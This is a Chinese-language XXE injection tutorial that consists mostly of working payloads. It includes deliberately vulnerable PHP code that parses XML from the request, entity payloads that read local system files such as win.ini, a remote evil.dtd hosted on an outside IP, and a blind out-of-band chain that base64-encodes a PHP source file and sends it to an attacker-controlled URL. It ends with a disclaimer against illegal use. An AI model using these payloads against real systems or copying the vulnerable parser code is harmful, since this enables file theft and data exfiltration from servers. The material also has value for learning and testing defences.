一. 源码
1. 有回显有报错测试代码
<?php
$xml=simplexml_load_string($_GET['xml']);
echo $xml
?>
2. 无回显无报错测试代码
<?php
$xml=@
simplexml_load_string($_POST['xml']);
?>
二. 内部实体演示
<!DOCTYPE foo
[<!ELEMENT foo
ANY ><!ENTITY xxe
"Thinking">]><foo
>&xxe
;</foo
>
<!DOCTYPE foo
[<!ELEMENT foo
ANY ><!ENTITY xxe
"Thinking">]><foo
>%26xxe
;</foo
>
三. 外部实体演示
<!ENTITY 实体名称
SYSTEM "URI/URL">
外部引用可支持http,file等协议,不同的语言支持的协议不同,但存在一些通用的协议,具体内容如下所示:
<!DOCTYPE foo
[<!ELEMENT foo
ANY ><!ENTITY xxe
SYSTEM "file:///c:/windows/win.ini" >]><foo
>%26xxe
;</foo
>
四. 参数实体演示
<!ENTITY % 实体名称 “实体的值”
>
<!ENTITY % 实体名称
SYSTEM “
URI”
>
<!DOCTYPE foo
[<!ELEMENT foo
ANY ><!ENTITY % xxe
SYSTEM "http://10.1.1.240:8080/evil.dtd">%xxe
;]><foo
>&evil
;</foo
>
evil
.dtd
<!ENTITY evil
SYSTEM "file:///c:/windows/win.ini" >
五. 无回显演示
<!DOCTYPE updateProfile
[<!ENTITY % file
SYSTEM "php://filter/read=convert.base64-encode/resource=./target.php"><!ENTITY % dtd
SYSTEM "http://10.10.87.228:81/3.txt">%dtd
;%send
;]>
<!ENTITY % all
"<!ENTITY % send SYSTEM ‘http://10.1.1.240:8080/?data=%file;’>" > %all
;
target
.php
sms2056
六. 参考
https://www.freebuf.com/column/156863.html
免责声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。禁止任何人转载到其他站点,禁止用于任何非法用途。如有任何人凭此做何非法事情,均于笔者无关,特此声明。
